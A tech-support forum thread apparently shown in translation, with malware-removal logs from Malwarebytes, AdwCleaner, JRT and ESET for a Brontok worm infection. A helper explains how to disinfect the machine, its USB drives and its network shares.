    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aaronchi@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ab@1.1.1.111.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ab@cd.ef.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\alysson87@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\attila.afra@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@digicool.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@zope.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bbb@ddd.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bbb@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob.smith@foo.tv.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@1.1.1.123.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@a.b.c.d.info.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@vsnl.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob_smith@foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\boehm@acm.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bruno@thefoundry.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cc@dd.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ccc@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\charsets@apple.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\CIP@autodesk.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cloudream@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cmlenz@gmx.de.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cmorley@vermontel.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\collver1@attbi.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\abuse@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob.smith@foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\copyright@riotgames.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dscherer@cmu.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe.tillis@unit.army.mil.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lu_zero@gentoo.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ppp@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\solar@openwall.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cosmint@cs.ubbcluj.ro.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cpasjuste@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cravindogs@cravindogs.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\c_rios@sonda.cl.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\daniel@haxx.se.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\david@megginson.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ddd@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\deadwisdom@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\design@bigelowandholmes.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dickey@invisible-island.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\diegog@unizar.es.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\doctor.z01db3rg@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dominik.reichl@t-online.de.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dominionx@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\edab.7804f5cb8070@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\eduardolundgren@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\eee@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\email@email.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\fdrake@acm.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\foo12@foo.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\foo99@foo.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\gerard@libmng.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B01D0B8X@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B01D0B8Y@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B04D0B8X@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B4GD0888@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B4HD0888@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\grupoepiffania@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\gzip@prep.ai.mit.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\help@uunet.uu.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\henryi@oxy.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ian@chiark.greenend.org.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\igor@mir2.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jack_rabbit@slims.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\james@conceptofzero.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jangel1@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jangel1@ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jloup@gzip.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@aol.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@company.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@web.info.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@wrox.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\johan.paul@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jonas@edgewall.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jorge@iryoku.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joseluisblancoc@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jseward@bzip.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\justivo@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kbk@shore.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kbwood@virginbroadband.com.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kmatsui@t3.rim.or.jp.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\krinklemail@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lorenm@u.washington.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lowe@cs.ubc.ca.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\m@marcgrabanski.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\madler@alumni.caltech.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\mailserv@ietf.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\mariusm@cs.ubc.ca.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\markus.oberhumer@jk.uni-linz.ac.at.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\memon@inside.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\michael_borgsys@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ml1050@cdata.tvnet.hu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\monty@xiph.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\nobody@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\None@bounce2.pobox.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ogg@illiminable.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pascal@obry.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pass@bleh.gif.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pesterhazy@gmx.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pickle136@sbcglobal.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\privacy.questions@autodesk.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\privacy@riotgames.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\randeg@alumni.rpi.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ross@ross.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sax@megginson.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\scoffman@wellpartner.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\scr@socal-raves.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sdl_touch@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\Silvia.Pfeiffer@csiro.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\silvia@annodex.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\simon.hvala@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\simon@thekelleys.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sjs@essex.ac.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\skip@pobox.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\slouken@libsdl.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\snowlion@sprynet.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\srl@jtcsv.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ssmith@aspalliance.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\stecnico@ea.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\stevenj@alum.mit.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sv@phystech.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\tekninentuki@europe.ea.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\Todd.Miller@courtesan.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\tony@trirand.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\uberlord@gentoo.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ui@jquery.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ultimo.lugar@grid.f1.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\user.name@mail.foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\verdy_p@wanadoo.fr.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\xx@xx.dk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\yoichi@fore.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\zlib@gzip.org.ini, Quarentena, [2750], [370221],1.0.2826

    Setor físico: 0
    (Nenhum item malicioso detectado)


    (end)

     

    AdwCleaner

     

    # AdwCleaner 7.0.2.1 - Logfile created on Mon Sep 18 02:15:43 2017
    # Updated on 2017/29/08 by Malwarebytes 
    # Running on Windows 7 Professional (X64)
    # Mode: clean
    # Support: https://www.malwarebytes.com/support

    ***** [ Services ] *****

    Deleted: Update service


    ***** [ Folders ] *****

    No malicious folders deleted.

    ***** [ Files ] *****

    No malicious files deleted.

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks deleted.

    ***** [ Registry ] *****

    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{30AE1F99-9CDB-4895-BEA4-C19346EA74EA}C:\program files (x86)\popcorn time\popcorntimedesktop.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{2954336B-B381-4DDF-8E2B-42A205A5AC2E}C:\program files (x86)\popcorn time\popcorntimedesktop.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{5A3A4798-1401-4480-BFAC-0CB7B367CC38}C:\program files (x86)\popcorn time\chromecast\node.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{BD0D6614-E21D-4501-923E-59D0D0782BC6}C:\program files (x86)\popcorn time\chromecast\node.exe
    Deleted: [Key] - HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
    Deleted: [Key] - HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
    Deleted: [Key] - HKLM\SOFTWARE\MozillaPlugins\@pandonetworks.com\PandoWebPlugin


    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries deleted.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries deleted.

    *************************

    ::Tracing keys deleted
    ::Winsock settings cleared
    ::Additional Actions: 0

    *************************

    C:/AdwCleaner/AdwCleaner[C0].txt - [2182 B] - [2017/9/14 0:38:41]
    C:/AdwCleaner/AdwCleaner[S0].txt - [2118 B] - [2017/9/14 0:37:59]
    C:/AdwCleaner/AdwCleaner[S1].txt - [2274 B] - [2017/9/18 2:15:27]


    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########

     

    JRT

     

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.4 (07.09.2017)
    Operating System: Windows 7 Professional x64 
    Ran by A (Administrator) on 17/09/2017 at 23:49:06,48
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    File System: 11 

    Successfully deleted: C:\Users\A\AppData\Roaming\3909 (Folder) 
    Successfully deleted: C:\Users\A\AppData\Roaming\convert audio free (Folder) 
    Successfully deleted: C:\Users\A\AppData\Roaming\pdfforge (Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BB8ZGNM9 (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GAI7SODA (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I3BCV9ID (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XI5WRL3O (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BB8ZGNM9 (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GAI7SODA (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I3BCV9ID (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XI5WRL3O (Temporary Internet Files Folder) 

    Registry: 0 

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 17/09/2017 at 23:50:41,94
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     

     

     


    @Murilo Beraldo

     

    Your computer is infected with a type of worm that spreads through any kind of removable storage device (flash drives, external HDDs, mp3 and mp4 players, phones, memory cards, digital cameras) and also through other machines connected to the same network.

    To keep your computer from being reinfected, and to avoid infecting other computers, you need to format the device in question.
    If there is more than one, all of them must be formatted and must not be used on any PC until we finish the cleanup, so that we can disinfect this computer.

    It is advisable to change all passwords stored on this PC. If you used or use internet banking, notify your financial institutions about what happened and change the passwords urgently.

    Download Panda USB Vaccine and save it to your desktop.

    • Connect all removable storage devices to the USB ports. Save whatever you think is necessary, EXCEPT executable files, then format the media by going to My Computer, right-clicking the media's drive and choosing the "Format" option.
    • Run Panda USB Vaccine.
    • Follow the prompts that may appear.
    • Wait until the program finishes its search, then exit the program.

    With the media still plugged into the USB ports, let's move on to the next step:

    Temporarily disable your antivirus and firewall

    • Click esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Run esetsmartinstaller_enu.exe.
      ** Windows Vista, Windows 7 and Windows 8/8.1 users:
      Right-click esetsmartinstaller_enu.exe, then click Run as administrator.
    • Check "YES, I accept the Terms of Use."
    • Wait for the program to download its components.
    • Check:
      • Enable detection of potentially unwanted applications.
    • Click Advanced settings and check the following:
      • Remove found threats
      • Scan archives
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth technology
    • Under "Current scan targets: Operating memory, Local drives" click Change...
    • Check:
      • All drives and removable media, if they are plugged in (C:, D:, E:, etc.)
    • Click OK
    • Now click START
    • It will update on its own and scan the computer. Be patient; the process can take hours.
    • When the scan finishes, click List of found threats
    • Click Copy to clipboard and paste the contents in your next reply. Note: if nothing is found, no log will be generated.
    • Click Back.
    • Click Finish.
    • You will be offered an installation of the paid version of ESET Smart Security. Click the [x] in the right-hand corner of the window.

     

    NOTE: After the procedure above, post a new MBAM log.

    Here

     

    ESET log

     

    \\Lucas-pc\Users\A\Desktop\Desktop\amtemu.v0.9.2-painter.rar    a variant of Win32/HackTool.Crack.FS potentially unsafe application    
    C:\Users\A\Desktop\Desktop\amtemu.v0.9.2-painter.rar    a variant of Win32/HackTool.Crack.FS potentially unsafe application    deleted
    E:\Lucas\pendrive\Pendrive\RegCure\RegCure Pro 3.1.6 (Mr7ech)\RegCureProSetup_RW.exe    a variant of Win32/RegCure.A potentially unwanted application    cleaned by deleting
